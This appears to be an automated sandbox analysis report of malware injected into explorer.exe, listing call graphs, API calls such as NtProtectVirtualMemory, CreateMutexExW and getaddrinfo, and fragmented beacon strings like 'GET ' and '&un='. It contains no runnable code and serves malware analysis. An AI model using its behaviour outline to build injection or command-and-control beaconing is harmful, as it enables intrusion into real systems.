13665 b140f48 13662->13665 13663 b141134 13663->13658 13664 b141232 NtCreateFile 13664->13665 13665->13663 13665->13664 13666 b1410e9 13665->13666 13687 b141f82 13665->13687 13667 b141125 13666->13667 13693 b140842 13666->13693 13701 b140922 13667->13701 13672 b13745b 13671->13672 13680 b1374c9 13671->13680 13673 b141232 NtCreateFile 13672->13673 13672->13680 13674 b137496 13673->13674 13679 b1374c5 13674->13679 13713 b137082 13674->13713 13675 b141232 NtCreateFile 13675->13680 13677 b1374b6 13677->13679 13722 b136f52 13677->13722 13679->13675 13679->13680 13680->13658 13682 b136109 13681->13682 13686 b1361d3 13681->13686 13727 b136012 13682->13727 13684 b136113 13685 b141f82 2 API calls 13684->13685 13684->13686 13685->13686 13686->13658 13688 b141fb8 13687->13688 13689 b13e5b2 socket 13688->13689 13690 b142081 13688->13690 13692 b142022 13688->13692 13689->13690 13691 b142117 getaddrinfo 13690->13691 13690->13692 13691->13692 13692->13665 13694 b14086d 13693->13694 13709 b141232 13694->13709 13696 b140906 13696->13666 13697 b140888 13697->13696 13698 b141f82 2 API calls 13697->13698 13699 b1408c5 13697->13699 13698->13699 13699->13696 13700 b141232 NtCreateFile 13699->13700 13700->13696 13702 b1409c2 13701->13702 13703 b141232 NtCreateFile 13702->13703 13706 b1409d6 13703->13706 13704 b140a9f 13704->13663 13705 b140a5d 13705->13704 13707 b141232 NtCreateFile 13705->13707 13706->13704 13706->13705 13708 b141f82 2 API calls 13706->13708 13707->13704 13708->13705 13710 b14125c 13709->13710 13712 b141334 13709->13712 13711 b141410 NtCreateFile 13710->13711 13710->13712 13711->13712 13712->13697 13714 b137420 13713->13714 13715 b1370aa 13713->13715 13714->13677 13715->13714 13716 b141232 NtCreateFile 13715->13716 13717 b1371f9 13716->13717 13718 b141232 NtCreateFile 13717->13718 13721 b1373df 13717->13721 13719 b1373c9 13718->13719 13720 b141232 NtCreateFile 13719->13720 13720->13721 13721->13677 13723 b136f70 13722->13723 13724 b136f84 13722->13724 13723->13679 13725 b141232 NtCreateFile 13724->13725 13726 b137046 13725->13726 13726->13679 13729 b136031 13727->13729 13728 b1360cd 13728->13684 13729->13728 13730 b141f82 2 API calls 13729->13730 13730->13728 13903 b139edd 13905 b139f06 13903->13905 13904 b139fa4 13905->13904 13906 b1368f2 NtProtectVirtualMemory 13905->13906 13907 b139f9c 13906->13907 13908 b13d382 ObtainUserAgentString 13907->13908 13908->13904 13490 b141f82 13491 b141fb8 13490->13491 13493 b142081 13491->13493 13495 b142022 13491->13495 13496 b13e5b2 13491->13496 13494 b142117 getaddrinfo 13493->13494 13493->13495 13494->13495 13497 b13e60a socket 13496->13497 13498 b13e5ec 13496->13498 13497->13493 13498->13497 13731 b13b14a 13732 b13b153 13731->13732 13733 b13b174 13731->13733 13735 b13d382 ObtainUserAgentString 13732->13735 13734 b13b1e7 13733->13734 13739 b1361f2 13733->13739 13736 b13b16c 13735->13736 13737 b1360f2 2 API calls 13736->13737 13737->13733 13740 b13620f 13739->13740 13741 b1362c9 13739->13741 13742 b140f12 3 API calls 13740->13742 13744 b136242 13740->13744 13741->13733 13742->13744 13743 b136289 13743->13741 13746 b1360f2 2 API calls 13743->13746 13744->13743 13745 b137432 NtCreateFile 13744->13745 13745->13743 13746->13741 13857 b143a4d 13858 b143a53 13857->13858 13861 b137782 13858->13861 13860 b143a6b 13862 b13778f 13861->13862 13863 b1377ad 13862->13863 13864 b13c662 2 API calls 13862->13864 13863->13860 13864->13863 13833 b142e0a 13834 b142e45 NtProtectVirtualMemory 13833->13834 13835 b141942 13833->13835 13836 b142e70 13834->13836 13835->13834 13794 b1375f1 13795 b137606 13794->13795 13796 b13760e 13794->13796 13798 b13c662 13795->13798 13799 b13c7ba 13798->13799 13800 b13c66b 13798->13800 13799->13796 13800->13799 13801 b1360f2 2 API calls 13800->13801 13803 b13c6ee 13801->13803 13802 b13c750 13802->13799 13805 b13c83f 13802->13805 13807 b13c791 13802->13807 13803->13802 13804 b141f82 2 API calls 13803->13804 13804->13802 13805->13799 13806 b141f82 2 API calls 13805->13806 13806->13799 13807->13799 13808 b141f82 2 API calls 13807->13808 13808->13799 13909 b1360f1 13910 b136109 13909->13910 13911 b1361d3 13909->13911 13912 b136012 2 API calls 13910->13912 13913 b136113 13912->13913 13913->13911 13914 b141f82 2 API calls 13913->13914 13914->13911 13809 b1439f1 13810 b1439f7 13809->13810 13813 b138852 13810->13813 13812 b143a0f 13814 b138865 13813->13814 13815 b1388e4 13813->13815 13814->13815 13817 b138887 13814->13817 13819 b13887e 13814->13819 13815->13812 13816 b13e36f 13816->13812 13817->13815 13818 b13c662 2 API calls 13817->13818 13818->13815 13819->13816 13820 b13e0c2 2 API calls 13819->13820 13820->13816 13505 b141232 13506 b14125c 13505->13506 13508 b141334 13505->13508 13507 b141410 NtCreateFile 13506->13507 13506->13508 13507->13508 13761 b1439b3 13762 b1439bd 13761->13762 13765 b1386d2 13762->13765 13764 b1439e0 13766 b1386f7 13765->13766 13767 b138704 13765->13767 13768 b1360f2 2 API calls 13766->13768 13769 b13872d 13767->13769 13771 b138737 13767->13771 13773 b1386ff 13767->13773 13768->13773 13774 b13e2c2 13769->13774 13772 b141f82 2 API calls 13771->13772 13771->13773 13772->13773 13773->13764 13775 b13e2cb 13774->13775 13776 b13e2df 13774->13776 13775->13776 13778 b13e0c2 13775->13778 13776->13773 13779 b13e0cb 13778->13779 13781 b13e1f0 13778->13781 13780 b141f82 2 API calls 13779->13780 13779->13781 13780->13781 13781->13776 13915 b13a2f4 13918 b13a349 13915->13918 13916 b13a49f 13917 b1368f2 NtProtectVirtualMemory 13916->13917 13922 b13a4c3 13916->13922 13917->13922 13918->13916 13919 b1368f2 NtProtectVirtualMemory 13918->13919 13920 b13a480 13919->13920 13921 b1368f2 NtProtectVirtualMemory 13920->13921 13921->13916 13923 b13a597 13922->13923 13924 b1368f2 NtProtectVirtualMemory 13922->13924 13925 b1368f2 NtProtectVirtualMemory 13923->13925 13928 b13a5bf 13923->13928 13924->13923 13925->13928 13926 b13a6e1 13927 b13d382 ObtainUserAgentString 13926->13927 13930 b13a6e9 13927->13930 13929 b13a6b9 13928->13929 13931 b1368f2 NtProtectVirtualMemory 13928->13931 13929->13926 13932 b1368f2 NtProtectVirtualMemory 13929->13932 13931->13929 13932->13926 13933 b13a0fb 13935 b13a137 13933->13935 13934 b13a2d5 13935->13934 13936 b1368f2 NtProtectVirtualMemory 13935->13936 13937 b13a28a 13936->13937 13938 b1368f2 NtProtectVirtualMemory 13937->13938 13941 b13a2a9 13938->13941 13939 b13a2cd 13940 b13d382 ObtainUserAgentString 13939->13940 13940->13934 13941->13939 13942 b1368f2 NtProtectVirtualMemory 13941->13942 13942->13939 13865 b13e0b9 13866 b13e0ed 13865->13866 13868 b13e1f0 13865->13868 13867 b141f82 2 API calls 13866->13867 13866->13868 13867->13868 13782 b139fbf 13784 b13a016 13782->13784 13783 b13a0e8 13785 b13d382 ObtainUserAgentString 13783->13785 13786 b1368f2 NtProtectVirtualMemory 13784->13786 13787 b13a0bb 13784->13787 13788 b13a0f0 13784->13788 13785->13788 13786->13787 13787->13783 13789 b1368f2 NtProtectVirtualMemory 13787->13789 13789->13783 13869 b13c8be 13870 b13c8c3 13869->13870 13871 b13c9a6 13870->13871 13872 b13c995 ObtainUserAgentString 13870->13872 13872->13871 13751 b141f7a 13752 b141fb8 13751->13752 13753 b13e5b2 socket 13752->13753 13754 b142081 13752->13754 13756 b142022 13752->13756 13753->13754 13755 b142117 getaddrinfo 13754->13755 13754->13756 13755->13756 13837 b14083a 13838 b140841 13837->13838 13839 b141f82 2 API calls 13838->13839 13840 b1408c5 13839->13840 13841 b140906 13840->13841 13842 b141232 NtCreateFile 13840->13842 13842->13841 13943 b13bce2 13945 b13bdd9 13943->13945 13944 b13c022 13945->13944 13946 b13b352 NtCreateFile 13945->13946 13947 b13bf0d 13946->13947 13947->13944 13948 b13b792 NtCreateFile 13947->13948 13948->13947 13757 b138b66 13759 b138b6a 13757->13759 13758 b138cce 13759->13758 13760 b138cb5 CreateMutexExW 13759->13760 13760->13758 13949 b13e2e4 13950 b13e36f 13949->13950 13951 b13e305 13949->13951 13951->13950 13952 b13e0c2 2 API calls 13951->13952 13952->13950 13509 b142bac 13510 b142bb1 13509->13510 13543 b142bb6 13510->13543 13544 b138b72 13510->13544 13512 b142c2c 13513 b142c85 13512->13513 13515 b142c54 13512->13515 13516 b142c69 13512->13516 13512->13543 13514 b140ab2 NtProtectVirtualMemory 13513->13514 13519 b142c8d 13514->13519 13520 b140ab2 NtProtectVirtualMemory 13515->13520 13517 b142c80 13516->13517 13518 b142c6e 13516->13518 13517->13513 13523 b142c97 13517->13523 13522 b140ab2 NtProtectVirtualMemory 13518->13522 13580 b13a102 13519->13580 13521 b142c5c 13520->13521 13566 b139ee2 13521->13566 13528 b142c76 13522->13528 13525 b142c9c 13523->13525 13526 b142cbe 13523->13526 13548 b140ab2 13525->13548 13530 b142cc7 13526->13530 13531 b142cd9 13526->13531 13526->13543 13572 b139fc2 13528->13572 13533 b140ab2 NtProtectVirtualMemory 13530->13533 13534 b140ab2 NtProtectVirtualMemory 13531->13534 13531->13543 13536 b142ccf 13533->13536 13537 b142ce5 13534->13537 13590 b13a2f2 13536->13590 13608 b13a712 13537->13608 13545 b138b93 13544->13545 13546 b138cb5 CreateMutexExW 13545->13546 13547 b138cce 13545->13547 13546->13547 13547->13512 13550 b140adf 13548->13550 13549 b140ebc 13558 b139de2 13549->13558 13550->13549 13620 b1368f2 13550->13620 13552 b140e5c 13553 b1368f2 NtProtectVirtualMemory 13552->13553 13554 b140e7c 13553->13554 13555 b1368f2 NtProtectVirtualMemory 13554->13555 13556 b140e9c 13555->13556 13557 b1368f2 NtProtectVirtualMemory 13556->13557 13557->13549 13560 b139df0 13558->13560 13559 b139ecd 13562 b136412 13559->13562 13560->13559 13643 b13d382 13560->13643 13564 b136440 13562->13564 13563 b136473 13563->13543 13564->13563 13565 b13644d CreateThread 13564->13565 13565->13543 13567 b139f06 13566->13567 13568 b139fa4 13567->13568 13569 b1368f2 NtProtectVirtualMemory 13567->13569 13568->13543 13570 b139f9c 13569->13570 13571 b13d382 ObtainUserAgentString 13570->13571 13571->13568 13574 b13a016 13572->13574 13573 b13a0f0 13573->13543 13574->13573 13577 b1368f2 NtProtectVirtualMemory 13574->13577 13578 b13a0bb 13574->13578 13575 b13a0e8 13576 b13d382 ObtainUserAgentString 13575->13576 13576->13573 13577->13578 13578->13575 13579 b1368f2 NtProtectVirtualMemory 13578->13579 13579->13575 13581 b13a137 13580->13581 13582 b13a2d5 13581->13582 13583 b1368f2 NtProtectVirtualMemory 13581->13583 13582->13543 13584 b13a28a 13583->13584 13585 b1368f2 NtProtectVirtualMemory 13584->13585 13588 b13a2a9 13585->13588 13586 b13a2cd 13587 b13d382 ObtainUserAgentString 13586->13587 13587->13582 13588->13586 13589 b1368f2 NtProtectVirtualMemory 13588->13589 13589->13586 13591 b13a349 13590->13591 13592 b13a49f 13591->13592 13594 b1368f2 NtProtectVirtualMemory 13591->13594 13593 b1368f2 NtProtectVirtualMemory 13592->13593 13597 b13a4c3 13592->13597 13593->13597 13595 b13a480 13594->13595 13596 b1368f2 NtProtectVirtualMemory 13595->13596 13596->13592 13598 b13a597 13597->13598 13599 b1368f2 NtProtectVirtualMemory 13597->13599 13600 b1368f2 NtProtectVirtualMemory 13598->13600 13603 b13a5bf 13598->13603 13599->13598 13600->13603 13601 b13a6e1 13602 b13d382 ObtainUserAgentString 13601->13602 13605 b13a6e9 13602->13605 13604 b13a6b9 13603->13604 13606 b1368f2 NtProtectVirtualMemory 13603->13606 13604->13601 13607 b1368f2 NtProtectVirtualMemory 13604->13607 13605->13543 13606->13604 13607->13601 13609 b13a767 13608->13609 13610 b1368f2 NtProtectVirtualMemory 13609->13610 13613 b13a903 13609->13613 13611 b13a8e3 13610->13611 13612 b1368f2 NtProtectVirtualMemory 13611->13612 13612->13613 13614 b13a992 13613->13614 13618 b1368f2 NtProtectVirtualMemory 13613->13618 13615 b13a9b7 13614->13615 13619 b1368f2 NtProtectVirtualMemory 13614->13619 13616 b13d382 ObtainUserAgentString 13615->13616 13617 b13a9bf 13616->13617 13617->13543 13618->13614 13619->13615 13621 b136987 13620->13621 13624 b1369b2 13621->13624 13635 b137622 13621->13635 13623 b136c0c 13623->13552 13624->13623 13625 b136ba2 13624->13625 13627 b136ac5 13624->13627 13626 b142e12 NtProtectVirtualMemory 13625->13626 13634 b136b5b 13626->13634 13639 b142e12 13627->13639 13629 b142e12 NtProtectVirtualMemory 13629->13623 13630 b136ae3 13630->13623 13631 b136b3d 13630->13631 13632 b142e12 NtProtectVirtualMemory 13630->13632 13633 b142e12 NtProtectVirtualMemory 13631->13633 13632->13631 13633->13634 13634->13623 13634->13629 13636 b13767a 13635->13636 13637 b137684 13636->13637 13638 b142e12 NtProtectVirtualMemory 13636->13638 13637->13624 13638->13636 13640 b141942 13639->13640 13641 b142e45 NtProtectVirtualMemory 13640->13641 13642 b142e70 13641->13642 13642->13630 13644 b13d3c7 13643->13644 13647 b13d232 13644->13647 13646 b13d438 13646->13559 13648 b13d25e 13647->13648 13651 b13c8c2 13648->13651 13650 b13d26b 13650->13646 13652 b13c934 13651->13652 13653 b13c9a6 13652->13653 13654 b13c995 ObtainUserAgentString 13652->13654 13653->13650 13654->13653 13843 b13d22a 13844 b13d25e 13843->13844 13845 b13c8c2 ObtainUserAgentString 13844->13845 13846 b13d26b 13845->13846 13847 b13742e 13848 b13745b 13847->13848 13856 b1374c9 13847->13856 13849 b141232 NtCreateFile 13848->13849 13848->13856 13850 b137496 13849->13850 13851 b1374c5 13850->13851 13853 b137082 NtCreateFile 13850->13853 13852 b141232 NtCreateFile 13851->13852 13851->13856 13852->13856 13854 b1374b6 13853->13854 13854->13851 13855 b136f52 NtCreateFile 13854->13855 13855->13851 13873 b143aa9 13874 b143aaf 13873->13874 13877 b13e212 13874->13877 13876 b143ac7 13878 b13e237 13877->13878 13879 b13e21b 13877->13879 13878->13876 13879->13878 13880 b13e0c2 2 API calls 13879->13880 13880->13878

                                                              Executed Functions

                                                              Function 0B141232 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 642filenativeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 291 b141232-b141256 292 b14125c-b141260 291->292 293 b1418bd-b1418cd 291->293 292->293 294 b141266-b1412a0 292->294 295 b1412a2-b1412a6 294->295 296 b1412bf 294->296 295->296 297 b1412a8-b1412ac 295->297 298 b1412c6 296->298 299 b1412b4-b1412b8 297->299 300 b1412ae-b1412b2 297->300 301 b1412cb-b1412cf 298->301 299->301 304 b1412ba-b1412bd 299->304 300->298 302 b1412d1-b1412f7 call b141942 301->302 303 b1412f9-b14130b 301->303 302->303 308 b141378 302->308 303->308 309 b14130d-b141332 303->309 304->301 312 b14137a-b1413a0 308->312 310 b141334-b14133b 309->310 311 b1413a1-b1413a8 309->311 315 b141366-b141370 310->315 316 b14133d-b141360 call b141942 310->316 313 b1413d5-b1413dc 311->313 314 b1413aa-b1413d3 call b141942 311->314 318 b141410-b141458 NtCreateFile call b141172 313->318 319 b1413de-b14140a call b141942 313->319 314->308 314->313 315->308 321 b141372-b141373 315->321 316->315 327 b14145d-b14145f 318->327 319->308 319->318 321->308 327->308 328 b141465-b14146d 327->328 328->308 329 b141473-b141476 328->329 330 b141486-b14148d 329->330 331 b141478-b141481 329->331 332 b1414c2-b1414ec 330->332 333 b14148f-b1414b8 call b141942 330->333 331->312 339 b1414f2-b1414f5 332->339 340 b1418ae-b1418b8 332->340 333->308 338 b1414be-b1414bf 333->338 338->332 341 b141604-b141611 339->341 342 b1414fb-b1414fe 339->342 340->308 341->312 343 b141500-b141507 342->343 344 b14155e-b141561 342->344 349 b141538-b141559 343->349 350 b141509-b141532 call b141942 343->350 346 b141616-b141619 344->346 347 b141567-b141572 344->347 354 b14161f-b141626 346->354 355 b1416b8-b1416bb 346->355 351 b141574-b14159d call b141942 347->351 352 b1415a3-b1415a6 347->352 356 b1415e9-b1415fa 349->356 350->308 350->349 351->308 351->352 352->308 358 b1415ac-b1415b6 352->358 362 b141657-b14166b call b142e92 354->362 363 b141628-b141651 call b141942 354->363 359 b1416bd-b1416c4 355->359 360 b141739-b14173c 355->360 356->341 358->308 368 b1415bc-b1415e6 358->368 369 b1416f5-b141734 359->369 370 b1416c6-b1416ef call b141942 359->370 364 b1417c4-b1417c7 360->364 365 b141742-b141749 360->365 362->308 380 b141671-b1416b3 362->380 363->308 363->362 364->308 376 b1417cd-b1417d4 364->376 373 b14177a-b1417bf 365->373 374 b14174b-b141774 call b141942 365->374 368->356 384 b141894-b1418a9 369->384 370->340 370->369 373->384 374->340 374->373 381 b1417d6-b1417f6 call b141942 376->381 382 b1417fc-b141803 376->382 380->312 381->382 388 b141805-b141825 call b141942 382->388 389 b14182b-b141835 382->389 384->312 388->389 389->340 391 b141837-b14183e 389->391 391->340 395 b141840-b141886 391->395 395->384
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3264280738.000000000B110000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B110000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_b110000_explorer.jbxd
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID: `
                                                              • API String ID: 823142352-2679148245
                                                              • Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                              • Instruction ID: a7bfdd33392cac2777adfdae5ae94caffed0d9181bf8931a74ad07767b8204d2
                                                              • Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                              • Instruction Fuzzy Hash: AD224D70A18A09AFCB59DF28C4957AEFBE1FB58301F50462ED45EE3650DB30E5A1CB81
                                                              Function 0B142E12 Relevance: 1.6, APIs: 1, Instructions: 59nativeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 430 b142e12-b142e6e call b141942 NtProtectVirtualMemory 433 b142e70-b142e7c 430->433 434 b142e7d-b142e8f 430->434
                                                              APIs
                                                              • NtProtectVirtualMemory.NTDLL ref: 0B142E67
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3264280738.000000000B110000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B110000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_b110000_explorer.jbxd
                                                              Similarity
                                                              • API ID: MemoryProtectVirtual
                                                              • String ID:
                                                              • API String ID: 2706961497-0
                                                              • Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                                              • Instruction ID: 6738f06b7875430b065b5054dce75a5bcdef8727f0240eb63ed803f922b9fb3a
                                                              • Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                                              • Instruction Fuzzy Hash: 2101B130668B484F8B88EF6CE48122AB7E4FBCD314F000B3EE99AC3254EB70C5414782
                                                              Function 0B142E0A Relevance: 1.6, APIs: 1, Instructions: 52nativeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 435 b142e0a-b142e38 436 b142e45-b142e6e NtProtectVirtualMemory 435->436 437 b142e40 call b141942 435->437 438 b142e70-b142e7c 436->438 439 b142e7d-b142e8f 436->439 437->436
                                                              APIs
                                                              • NtProtectVirtualMemory.NTDLL ref: 0B142E67
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3264280738.000000000B110000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B110000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_b110000_explorer.jbxd
                                                              Similarity
                                                              • API ID: MemoryProtectVirtual
                                                              • String ID:
                                                              • API String ID: 2706961497-0
                                                              • Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                                              • Instruction ID: a2bc0114a0696f67b452de8fadbc733e7699498bc3b0535f0a8fbd0539f7bfbf
                                                              • Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                                              • Instruction Fuzzy Hash: ED01A234628B884F8B48EB2C94412A6B7E5FBCE314F000B3EE99AC3240DB31D5024782
                                                              Function 0B141F82 Relevance: 20.1, APIs: 1, Strings: 10, Instructions: 815COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 0 b141f82-b141fb6 1 b141fd6-b141fd9 0->1 2 b141fb8-b141fbc 0->2 4 b1428fe-b14290c 1->4 5 b141fdf-b141fed 1->5 2->1 3 b141fbe-b141fc2 2->3 3->1 6 b141fc4-b141fc8 3->6 7 b1428f6-b1428f7 5->7 8 b141ff3-b141ff7 5->8 6->1 9 b141fca-b141fce 6->9 7->4 10 b141fff-b142000 8->10 11 b141ff9-b141ffd 8->11 9->1 12 b141fd0-b141fd4 9->12 13 b14200a-b142010 10->13 11->10 11->13 12->1 12->5 14 b142012-b142020 13->14 15 b14203a-b142060 13->15 14->15 16 b142022-b142026 14->16 17 b142062-b142066 15->17 18 b142068-b14207c call b13e5b2 15->18 16->7 19 b14202c-b142035 16->19 17->18 20 b1420a8-b1420ab 17->20 22 b142081-b1420a2 18->22 19->7 23 b142144-b142150 20->23 24 b1420b1-b1420b8 20->24 22->20 26 b1428ee-b1428ef 22->26 25 b142156-b142165 23->25 23->26 27 b1420e2-b1420f5 24->27 28 b1420ba-b1420dc call b141942 24->28 29 b142167-b142178 call b13e552 25->29 30 b14217f-b14218f 25->30 26->7 27->26 32 b1420fb-b142101 27->32 28->27 29->30 34 b1421e5-b14221b 30->34 35 b142191-b1421da call b13e732 30->35 32->26 37 b142107-b142109 32->37 40 b14222d-b142231 34->40 41 b14221d-b14222b 34->41 35->34 49 b1421dc-b1421e1 35->49 37->26 42 b14210f-b142111 37->42 45 b142247-b14224b 40->45 46 b142233-b142245 40->46 44 b14227f-b142280 41->44 42->26 47 b142117-b142132 getaddrinfo 42->47 48 b142283-b1422e0 call b142d62 call b13f482 call b13ee72 call b143002 44->48 50 b142261-b142265 45->50 51 b14224d-b14225f 45->51 46->44 47->23 52 b142134-b14213c 47->52 63 b1422f4-b142354 call b142d92 48->63 64 b1422e2-b1422e6 48->64 49->34 53 b142267-b14226b 50->53 54 b14226d-b142279 50->54 51->44 52->23 53->48 53->54 54->44 69 b14248c-b1424b8 call b142d62 call b143262 63->69 70 b14235a-b142396 call b142d62 call b143262 call b143002 63->70 64->63 66 b1422e8-b1422ef call b13f042 64->66 66->63 79 b1424d9-b142590 call b143262 * 3 call b143002 * 2 call b13f482 69->79 80 b1424ba-b1424d5 69->80 85 b142398-b1423b7 call b143262 call b143002 70->85 86 b1423bb-b1423e9 call b143262 * 2 70->86 111 b142595-b1425b9 call b143262 79->111 80->79 85->86 100 b142415-b14241d 86->100 101 b1423eb-b142410 call b143002 call b143262 86->101 105 b142442-b142448 100->105 106 b14241f-b142425 100->106 101->100 105->111 112 b14244e-b142456 105->112 109 b142467-b142487 call b143262 106->109 110 b142427-b14243d 106->110 109->111 110->111 121 b1425d1-b1426ad call b143262 * 7 call b143002 call b142d62 call b143002 call b13ee72 call b13f042 111->121 122 b1425bb-b1425cc call b143262 call b143002 111->122 112->111 116 b14245c-b14245d 112->116 116->109 133 b1426af-b1426b3 121->133 122->133 135 b1426b5-b1426fa call b13e382 call b13e7b2 133->135 136 b1426ff-b14272d call b13e6b2 133->136 158 b1428e6-b1428e7 135->158 143 b14275d-b142761 136->143 144 b14272f-b142735 136->144 148 b142767-b14276b 143->148 149 b14290d-b142913 143->149 144->143 147 b142737-b14274c 144->147 147->143 152 b14274e-b142754 147->152 153 b142771-b142773 148->153 154 b1428aa-b1428df call b13e7b2 148->154 155 b142779-b142784 149->155 156 b142919-b142920 149->156 152->143 160 b142756 152->160 153->154 153->155 154->158 161 b142786-b142793 155->161 162 b142795-b142796 155->162 156->161 158->26 160->143 161->162 165 b14279c-b1427a0 161->165 162->165 167 b1427b1-b1427b2 165->167 168 b1427a2-b1427af 165->168 170 b1427b8-b1427c4 167->170 168->167 168->170 173 b1427f4-b142861 170->173 174 b1427c6-b1427ef call b142d92 call b142d62 170->174 185 b1428a3-b1428a4 173->185 186 b142863 173->186 174->173 185->154 186->185 188 b142865-b14286a 186->188 188->185 190 b14286c-b142872 188->190 190->185 192 b142874-b1428a1 190->192 192->185 192->186
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3264280738.000000000B110000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B110000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_b110000_explorer.jbxd
                                                              Similarity
                                                              • API ID: getaddrinfo
                                                              • String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
                                                              • API String ID: 300660673-1117930895
                                                              • Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                                              • Instruction ID: 9fa2341a29c7eecc2caa9d189de59c7ba12a140dfa64137f352d3a1ef340efb9
                                                              • Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                                              • Instruction Fuzzy Hash: 05526E30624A088FCB29EF68D494BE9B7E1FB54300F50462ED4AFD7146DF70A58ACB85
                                                              Function 0B13C8C2 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • ObtainUserAgentString.URLMON ref: 0B13C9A0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3264280738.000000000B110000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B110000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_b110000_explorer.jbxd
                                                              Similarity
                                                              • API ID: AgentObtainStringUser
                                                              • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                              • API String ID: 2681117516-319646191
                                                              • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                              • Instruction ID: 724014bf73cfe806b4392c4fdd7279acfd0bb330a887e4ed22d2e35e2a4e8a27
                                                              • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                              • Instruction Fuzzy Hash: EC31D171614A0C8FCB14EFA8D8857EDBBE0FB58205F40022AD45EE7240EF748645C789
                                                              Function 0B13C8BE Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • ObtainUserAgentString.URLMON ref: 0B13C9A0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3264280738.000000000B110000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B110000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_b110000_explorer.jbxd
                                                              Similarity
                                                              • API ID: AgentObtainStringUser
                                                              • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                              • API String ID: 2681117516-319646191
                                                              • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                              • Instruction ID: 908b9521c26c23dee6d7bc1fefa2907cf4ceed413475fc770227bce02c5897d0
                                                              • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                              • Instruction Fuzzy Hash: 3021D270A14A0C8FCB15EFA8D8957EDBBF4FF58205F40422AE45AE7240EF748645C789
                                                              Function 0B138B66 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148synchronizationCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 234 b138b66-b138b68 235 b138b93-b138bb8 234->235 236 b138b6a-b138b71 234->236 238 b138bbb-b138c22 call b13f612 call b141942 * 2 235->238 236->238 239 b138b73-b138b92 236->239 246 b138c28-b138c2b 238->246 247 b138cdc 238->247 239->235 246->247 249 b138c31-b138cb0 call b143da4 call b143022 call b1433e2 call b143022 call b1433e2 246->249 248 b138cde-b138cf6 247->248 261 b138cb5-b138cca CreateMutexExW 249->261 262 b138cce-b138cd3 261->262 262->247 263 b138cd5-b138cda 262->263 263->248
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3264280738.000000000B110000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B110000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_b110000_explorer.jbxd
                                                              Similarity
                                                              • API ID: CreateMutex
                                                              • String ID: .dll$el32$kern
                                                              • API String ID: 1964310414-1222553051
                                                              • Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                                              • Instruction ID: ed0255df83abc0cadaa90d621beff96f8aa9cade817219c2509882cf516fcc18
                                                              • Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
